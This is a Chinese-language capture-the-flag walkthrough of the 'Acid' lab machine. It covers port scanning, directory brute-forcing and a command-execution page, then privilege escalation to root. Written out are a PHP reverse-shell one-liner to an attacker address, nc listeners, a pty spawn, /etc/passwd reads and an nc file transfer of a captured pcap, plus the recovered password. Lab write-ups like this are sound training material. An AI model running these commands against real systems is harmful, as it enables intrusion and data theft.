靶机(四)----Acid
靶机信息
靶机说明
Welcome to the world of Acid. Fairy tails uses secret keys to open the magical doors.
欢迎来到Acid的世界。童话故事需要使用秘密钥匙打开魔法门。
目标
作者:红日安全
获得root权限和flag。
运行环境
靶机配置:该虚拟机完全基于Web,提取rar并使用VMplayer运行vmx,网络连接方式设置为net,靶机自动
获取IP。
攻击机配置:同网段下有Windows攻击机,安装有Burpsuit、nc、Python2.7、DirBuster、御剑等渗透工
具。
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
首先根据运行环境进行配置靶机环境,使他可以获取到Ip
信息收集 nmap 192.168.1.0/24发现靶机IP地址 192.168.1.128
扫描端口 这次没有80WEB端口 但是多了个33447端口
访问33447端口看一眼
老样子,看不懂,源码看一下
这一串隐藏在最后的编码
这串编码也不知道怎么解,先放一放。扫描敏感目录看看
御剑爆不出来 拿dirbuster爆破试试
整个网站的目录结构 images icons css chailenge server-status
通过一个一个目录爆破尝试 最后challenge里有点东西
扫除一堆 我们一个一个看
Challenge打开长这个样子 看了看源码也没有什么东西
Cake.php 貌似也没有什么东西 看一眼源码
源码中好像还有个目录 不让访问 爆破跑一下
爆破http://192.168.1.128:33447/Challeng/Magic_Box/
爆破到了一个好文件 一个command.php 直接上命令执行试一试
打开这个command.php 主页中间就有一串账号或者密码 这是一个命令执行页面
这个地方百度了一下 反弹shell得用php反弹
php -r ‘$sock=fsockopen(“192.168.1.129”,8666);exec("/bin/sh -i <&3 >&3 2>&3");’
首先需要编一下url编码
Kali需要开启端口监听 nc –lvnp 8666
进行发送
做了这么多次靶场第一次反弹shell一次成功
用python命令生成一个虚拟的终端( Python -c ‘import pty;pty.spawn("/bin/sh")’ )
正常时查看磁盘流量包 在流量包里查询密码
步骤是查看用户cat /etc/passwd
然后查找用户文件 find / -user acid 2>/dev/null
发现网络流量包 用nc传输到kali nc -lvnp 3333 > hint.pcapng
将这个包下载下来进行Wireshark分析
nc 172.20.10.128 3333 < /sbin/raw_vs_isi/hint.pcapng
最后找到这条包含密码的数据
也就是我们开头处直接显示在页面的那个密码1337hax0r
su saman 切换
执行python -c ‘import pty;pty.spawn("/bin/bash")’
继续su saman 输入密码1337hax0r 成功提权到saman
成功提权到root
直接查看flag
不做到最后,打死也想不到主页飘着的那几个英语单词是密码。太难了,这是彩蛋嘛???
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
♥关于这个原创问题,我只能说,有的时候我没思路了,也会去百度文章,参考一下大佬的思路,主要目的是大家一块学习。如果我有侵犯了您的原创问题,请私信我,我会及时改正的。谢谢~~
